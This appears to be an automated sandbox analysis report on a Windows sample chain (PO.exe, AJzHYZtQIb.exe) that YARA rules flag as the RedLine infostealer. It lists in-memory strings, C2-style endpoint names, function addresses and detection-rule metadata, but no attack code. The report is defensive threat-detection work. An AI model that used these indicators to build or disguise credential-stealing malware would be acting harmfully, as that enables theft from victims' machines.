                      Source: PO.exe, 00000007.00000002.2160002789.0000000002A55000.00000004.00000800.00020000.00000000.sdmp, PO.exe, 0000000E.00000002.2276292357.0000000003181000.00000004.00000800.00020000.00000000.sdmp, AJzHYZtQIb.exe, 00000010.00000002.2245706074.0000000003018000.00000004.00000800.00020000.00000000.sdmp, AJzHYZtQIb.exe, 00000015.00000002.2357626482.0000000002FB9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: AJzHYZtQIb.exe, 00000015.00000002.2357626482.000000000300B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/
                      Source: PO.exe, 0000000E.00000002.2276292357.0000000003181000.00000004.00000800.00020000.00000000.sdmp, AJzHYZtQIb.exe, 00000015.00000002.2357626482.0000000002FB9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/0
                      Source: PO.exe, 0000000E.00000002.2276292357.0000000003181000.00000004.00000800.00020000.00000000.sdmp, AJzHYZtQIb.exe, 00000015.00000002.2357626482.0000000002FB9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/CheckConnect
                      Source: PO.exe, 0000000E.00000002.2276292357.0000000003181000.00000004.00000800.00020000.00000000.sdmp, AJzHYZtQIb.exe, 00000015.00000002.2357626482.0000000002FB9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/CheckConnectResponse
                      Source: PO.exe, 0000000E.00000002.2276292357.0000000003181000.00000004.00000800.00020000.00000000.sdmp, PO.exe, 0000000E.00000002.2276292357.00000000031D0000.00000004.00000800.00020000.00000000.sdmp, AJzHYZtQIb.exe, 00000015.00000002.2357626482.0000000002FB9000.00000004.00000800.00020000.00000000.sdmp, AJzHYZtQIb.exe, 00000015.00000002.2357626482.0000000002FF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/EnvironmentSettings
                      Source: PO.exe, 0000000E.00000002.2276292357.0000000003181000.00000004.00000800.00020000.00000000.sdmp, AJzHYZtQIb.exe, 00000015.00000002.2357626482.0000000002FB9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/EnvironmentSettingsResponse
                      Source: AJzHYZtQIb.exe, 00000015.00000002.2357626482.00000000030A3000.00000004.00000800.00020000.00000000.sdmp, AJzHYZtQIb.exe, 00000015.00000002.2357626482.0000000002FF0000.00000004.00000800.00020000.00000000.sdmp, AJzHYZtQIb.exe, 00000015.00000002.2357626482.0000000003019000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/GetUpdates
                      Source: PO.exe, 0000000E.00000002.2276292357.0000000003181000.00000004.00000800.00020000.00000000.sdmp, AJzHYZtQIb.exe, 00000015.00000002.2357626482.0000000002FB9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/GetUpdatesResponse
                      Source: AJzHYZtQIb.exe, 00000015.00000002.2357626482.00000000030A3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/SetEnvironment
                      Source: PO.exe, 0000000E.00000002.2276292357.0000000003181000.00000004.00000800.00020000.00000000.sdmp, AJzHYZtQIb.exe, 00000015.00000002.2357626482.0000000002FB9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/SetEnvironmentResponse
                      Source: PO.exe, 0000000E.00000002.2276292357.0000000003181000.00000004.00000800.00020000.00000000.sdmp, AJzHYZtQIb.exe, 00000015.00000002.2357626482.0000000002FB9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/VerifyUpdate
                      Source: PO.exe, 0000000E.00000002.2276292357.0000000003181000.00000004.00000800.00020000.00000000.sdmp, AJzHYZtQIb.exe, 00000015.00000002.2357626482.0000000002FB9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/VerifyUpdateResponse
                      Source: PO.exeString found in binary or memory: http://www.aforgenet.com/framework/
                      Source: AJzHYZtQIb.exe, 00000010.00000002.2245706074.0000000002F69000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.w3.or
                      Source: tmp4887.tmp.21.dr, tmp4825.tmp.21.dr, tmp7F38.tmp.21.dr, tmp10D6.tmp.21.dr, tmp989A.tmp.14.dr, tmp10A5.tmp.21.dr, tmp4836.tmp.21.dr, tmp6270.tmp.14.dr, tmp98BA.tmp.14.dr, tmp4876.tmp.21.dr, tmp6291.tmp.14.dr, tmp4856.tmp.21.dr, tmp6280.tmp.14.dr, tmp9889.tmp.14.dr, tmp624F.tmp.14.dr, tmp1107.tmp.21.dr, tmp10C5.tmp.21.dr, tmp9838.tmp.14.dr, tmp9858.tmp.14.dr, tmp10F6.tmp.21.dr, tmp623F.tmp.14.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                      Source: AJzHYZtQIb.exe, 00000015.00000002.2357626482.0000000002FFA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ip.sb
                      Source: AJzHYZtQIb.exe, 00000015.00000002.2357626482.0000000002FFA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ip.sb/geoip
                      Source: PO.exe, PO.exe, 0000000E.00000002.2274416687.0000000000402000.00000040.00000400.00020000.00000000.sdmp, AJzHYZtQIb.exe, 00000010.00000002.2247047739.0000000004AFD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ip.sb/geoip%USERPEnvironmentROFILE%
                      Source: PO.exe, PO.exe, 0000000E.00000002.2274416687.0000000000402000.00000040.00000400.00020000.00000000.sdmp, AJzHYZtQIb.exe, 00000010.00000002.2247047739.0000000004AFD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.orgcookies//settinString.Removeg
                      Source: tmp4887.tmp.21.dr, tmp4825.tmp.21.dr, tmp7F38.tmp.21.dr, tmp10D6.tmp.21.dr, tmp989A.tmp.14.dr, tmp10A5.tmp.21.dr, tmp4836.tmp.21.dr, tmp6270.tmp.14.dr, tmp98BA.tmp.14.dr, tmp4876.tmp.21.dr, tmp6291.tmp.14.dr, tmp4856.tmp.21.dr, tmp6280.tmp.14.dr, tmp9889.tmp.14.dr, tmp624F.tmp.14.dr, tmp1107.tmp.21.dr, tmp10C5.tmp.21.dr, tmp9838.tmp.14.dr, tmp9858.tmp.14.dr, tmp10F6.tmp.21.dr, tmp623F.tmp.14.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                      Source: tmp4887.tmp.21.dr, tmp4825.tmp.21.dr, tmp7F38.tmp.21.dr, tmp10D6.tmp.21.dr, tmp989A.tmp.14.dr, tmp10A5.tmp.21.dr, tmp4836.tmp.21.dr, tmp6270.tmp.14.dr, tmp98BA.tmp.14.dr, tmp4876.tmp.21.dr, tmp6291.tmp.14.dr, tmp4856.tmp.21.dr, tmp6280.tmp.14.dr, tmp9889.tmp.14.dr, tmp624F.tmp.14.dr, tmp1107.tmp.21.dr, tmp10C5.tmp.21.dr, tmp9838.tmp.14.dr, tmp9858.tmp.14.dr, tmp10F6.tmp.21.dr, tmp623F.tmp.14.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                      Source: tmp4887.tmp.21.dr, tmp4825.tmp.21.dr, tmp7F38.tmp.21.dr, tmp10D6.tmp.21.dr, tmp989A.tmp.14.dr, tmp10A5.tmp.21.dr, tmp4836.tmp.21.dr, tmp6270.tmp.14.dr, tmp98BA.tmp.14.dr, tmp4876.tmp.21.dr, tmp6291.tmp.14.dr, tmp4856.tmp.21.dr, tmp6280.tmp.14.dr, tmp9889.tmp.14.dr, tmp624F.tmp.14.dr, tmp1107.tmp.21.dr, tmp10C5.tmp.21.dr, tmp9838.tmp.14.dr, tmp9858.tmp.14.dr, tmp10F6.tmp.21.dr, tmp623F.tmp.14.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                      Source: tmp4887.tmp.21.dr, tmp4825.tmp.21.dr, tmp7F38.tmp.21.dr, tmp10D6.tmp.21.dr, tmp989A.tmp.14.dr, tmp10A5.tmp.21.dr, tmp4836.tmp.21.dr, tmp6270.tmp.14.dr, tmp98BA.tmp.14.dr, tmp4876.tmp.21.dr, tmp6291.tmp.14.dr, tmp4856.tmp.21.dr, tmp6280.tmp.14.dr, tmp9889.tmp.14.dr, tmp624F.tmp.14.dr, tmp1107.tmp.21.dr, tmp10C5.tmp.21.dr, tmp9838.tmp.14.dr, tmp9858.tmp.14.dr, tmp10F6.tmp.21.dr, tmp623F.tmp.14.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                      Source: tmp4887.tmp.21.dr, tmp4825.tmp.21.dr, tmp7F38.tmp.21.dr, tmp10D6.tmp.21.dr, tmp989A.tmp.14.dr, tmp10A5.tmp.21.dr, tmp4836.tmp.21.dr, tmp6270.tmp.14.dr, tmp98BA.tmp.14.dr, tmp4876.tmp.21.dr, tmp6291.tmp.14.dr, tmp4856.tmp.21.dr, tmp6280.tmp.14.dr, tmp9889.tmp.14.dr, tmp624F.tmp.14.dr, tmp1107.tmp.21.dr, tmp10C5.tmp.21.dr, tmp9838.tmp.14.dr, tmp9858.tmp.14.dr, tmp10F6.tmp.21.dr, tmp623F.tmp.14.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                      Source: tmp4887.tmp.21.dr, tmp4825.tmp.21.dr, tmp7F38.tmp.21.dr, tmp10D6.tmp.21.dr, tmp989A.tmp.14.dr, tmp10A5.tmp.21.dr, tmp4836.tmp.21.dr, tmp6270.tmp.14.dr, tmp98BA.tmp.14.dr, tmp4876.tmp.21.dr, tmp6291.tmp.14.dr, tmp4856.tmp.21.dr, tmp6280.tmp.14.dr, tmp9889.tmp.14.dr, tmp624F.tmp.14.dr, tmp1107.tmp.21.dr, tmp10C5.tmp.21.dr, tmp9838.tmp.14.dr, tmp9858.tmp.14.dr, tmp10F6.tmp.21.dr, tmp623F.tmp.14.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                      Source: PO.exe, PO.exe, 0000000E.00000002.2274416687.0000000000402000.00000040.00000400.00020000.00000000.sdmp, AJzHYZtQIb.exe, 00000010.00000002.2247047739.0000000004AFD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ipinfo.io/ip%appdata%
                      Source: PO.exeString found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/0
                      Source: tmp4887.tmp.21.dr, tmp4825.tmp.21.dr, tmp7F38.tmp.21.dr, tmp10D6.tmp.21.dr, tmp989A.tmp.14.dr, tmp10A5.tmp.21.dr, tmp4836.tmp.21.dr, tmp6270.tmp.14.dr, tmp98BA.tmp.14.dr, tmp4876.tmp.21.dr, tmp6291.tmp.14.dr, tmp4856.tmp.21.dr, tmp6280.tmp.14.dr, tmp9889.tmp.14.dr, tmp624F.tmp.14.dr, tmp1107.tmp.21.dr, tmp10C5.tmp.21.dr, tmp9838.tmp.14.dr, tmp9858.tmp.14.dr, tmp10F6.tmp.21.dr, tmp623F.tmp.14.drString found in binary or memory: https://www.ecosia.org/newtab/
                      Source: tmp4887.tmp.21.dr, tmp4825.tmp.21.dr, tmp7F38.tmp.21.dr, tmp10D6.tmp.21.dr, tmp989A.tmp.14.dr, tmp10A5.tmp.21.dr, tmp4836.tmp.21.dr, tmp6270.tmp.14.dr, tmp98BA.tmp.14.dr, tmp4876.tmp.21.dr, tmp6291.tmp.14.dr, tmp4856.tmp.21.dr, tmp6280.tmp.14.dr, tmp9889.tmp.14.dr, tmp624F.tmp.14.dr, tmp1107.tmp.21.dr, tmp10C5.tmp.21.dr, tmp9838.tmp.14.dr, tmp9858.tmp.14.dr, tmp10F6.tmp.21.dr, tmp623F.tmp.14.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

                      System Summary

                      barindex
                      Source: 7.2.PO.exe.3c18d70.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                      Source: 7.2.PO.exe.3c18d70.3.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                      Source: 7.2.PO.exe.3c00f50.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                      Source: 7.2.PO.exe.3c00f50.4.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                      Source: 14.2.PO.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                      Source: 14.2.PO.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                      Source: 7.2.PO.exe.3c18d70.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                      Source: 7.2.PO.exe.3c18d70.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                      Source: 7.2.PO.exe.3c00f50.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                      Source: 7.2.PO.exe.3c00f50.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                      Source: 0000000E.00000002.2274416687.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                      Source: 00000010.00000002.2247047739.0000000004AFD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                      Source: 00000007.00000002.2160567285.000000000453C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                      Source: 00000007.00000002.2160567285.0000000003C00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                      Source: Process Memory Space: PO.exe PID: 7532, type: MEMORYSTRMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                      Source: Process Memory Space: PO.exe PID: 8068, type: MEMORYSTRMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                      Source: Process Memory Space: AJzHYZtQIb.exe PID: 8164, type: MEMORYSTRMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                      Source: C:\Users\user\Desktop\w4XFffGDz1.exeCode function: 0_2_0017720F
                      Source: C:\Users\user\Desktop\w4XFffGDz1.exeCode function: 0_2_0017E3FB
                      Source: C:\Users\user\Desktop\w4XFffGDz1.exeCode function: 0_2_0017837D
                      Source: C:\Users\user\Desktop\w4XFffGDz1.exeCode function: 0_2_0018E430
                      Source: C:\Users\user\Desktop\w4XFffGDz1.exeCode function: 0_2_00192578
                      Source: C:\Users\user\Desktop\w4XFffGDz1.exeCode function: 0_2_00172606
                      Source: C:\Users\user\Desktop\w4XFffGDz1.exeCode function: 0_2_001927A7
                      Source: C:\Users\user\Desktop\w4XFffGDz1.exeCode function: 0_2_00180870
                      Source: C:\Users\user\Desktop\w4XFffGDz1.exeCode function: 0_2_00178934
                      Source: C:\Users\user\Desktop\w4XFffGDz1.exeCode function: 0_2_0019AA50
                      Source: C:\Users\user\Desktop\w4XFffGDz1.exeCode function: 0_2_0017FBD3
                      Source: C:\Users\user\Desktop\w4XFffGDz1.exeCode function: 0_2_00178D89
                      Source: C:\Users\user\Desktop\w4XFffGDz1.exeCode function: 0_2_0019EE32
                      Source: C:\Users\user\Desktop\w4XFffGDz1.exeCode function: 0_2_0019AEFE
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeCode function: 7_2_05B70670
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeCode function: 7_2_05B7D210
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeCode function: 7_2_05B7E818
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeCode function: 7_2_05B7E80A
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeCode function: 7_2_070E540F
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeCode function: 7_2_070E61BC
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeCode function: 7_2_070E4FE8
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeCode function: 7_2_070E2C18
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeCode function: 7_2_070E96D0
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeCode function: 7_2_070E5387
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeCode function: 7_2_070E539C
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeCode function: 7_2_070E4FD8
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeCode function: 7_2_070E9DE0
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeCode function: 7_2_070E9DF0
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeCode function: 7_2_070E2C09
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeCode function: 7_2_070E99AB
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeCode function: 7_2_07A51628
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeCode function: 7_2_07A52E38
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeCode function: 7_2_07A51638
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeCode function: 7_2_07A59E60
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeCode function: 7_2_07A50DB8
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeCode function: 7_2_07A50DC8
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeCode function: 7_2_07A502B8
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeCode function: 7_2_07A51200
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeCode function: 7_2_07A53270
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeCode function: 7_2_07A511F0
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeCode function: 14_2_02FBE7B0
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeCode function: 14_2_02FBDC90
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeCode function: 14_2_06979630
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeCode function: 14_2_06974468
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeCode function: 14_2_06973311
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeCode function: 14_2_06971300
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeCode function: 14_2_0697DD18
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeCode function: 14_2_0697DA24
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeCode function: 14_2_0697D528
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeCode function: 14_2_069712FB
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeCode function: 16_2_05460040
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeCode function: 16_2_054609F0
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeCode function: 16_2_05460A00
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeCode function: 16_2_07AA8278
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeCode function: 16_2_07AA1628
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeCode function: 16_2_07AA1638
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeCode function: 16_2_07AA2E38
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeCode function: 16_2_07AA0DB8
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeCode function: 16_2_07AA0DC8
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeCode function: 16_2_07AA02B8
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeCode function: 16_2_07AA1200
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeCode function: 16_2_07AA3270
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeCode function: 16_2_07AA11F0
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeCode function: 16_2_08D42C18
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeCode function: 16_2_08D44FE8
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeCode function: 16_2_08D4540F
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeCode function: 16_2_08D42C09
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeCode function: 16_2_08D49DF0
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeCode function: 16_2_08D49DE0
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeCode function: 16_2_08D44FD8
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeCode function: 16_2_08D4539C
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeCode function: 16_2_08D45387
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeCode function: 16_2_08D496D0
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeCode function: 21_2_010DE7B0
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeCode function: 21_2_010DDC90
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeCode function: 21_2_06789630
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeCode function: 21_2_06784468
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeCode function: 21_2_0678D528
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeCode function: 21_2_06781210
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeCode function: 21_2_06783320
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeCode function: 21_2_0678DA30
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeCode function: 21_2_0678C418
                      Source: C:\Users\user\Desktop\w4XFffGDz1.exeCode function: String function: 0018C468 appears 55 times
                      Source: w4XFffGDz1.exe, 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameRzhrA.exe8 vs w4XFffGDz1.exe
                      Source: w4XFffGDz1.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: 7.2.PO.exe.3c18d70.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                      Source: 7.2.PO.exe.3c18d70.3.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                      Source: 7.2.PO.exe.3c00f50.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                      Source: 7.2.PO.exe.3c00f50.4.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                      Source: 14.2.PO.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                      Source: 14.2.PO.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                      Source: 7.2.PO.exe.3c18d70.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                      Source: 7.2.PO.exe.3c18d70.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                      Source: 7.2.PO.exe.3c00f50.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                      Source: 7.2.PO.exe.3c00f50.4.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                      Source: 0000000E.00000002.2274416687.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                      Source: 00000010.00000002.2247047739.0000000004AFD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                      Source: 00000007.00000002.2160567285.000000000453C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                      Source: 00000007.00000002.2160567285.0000000003C00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
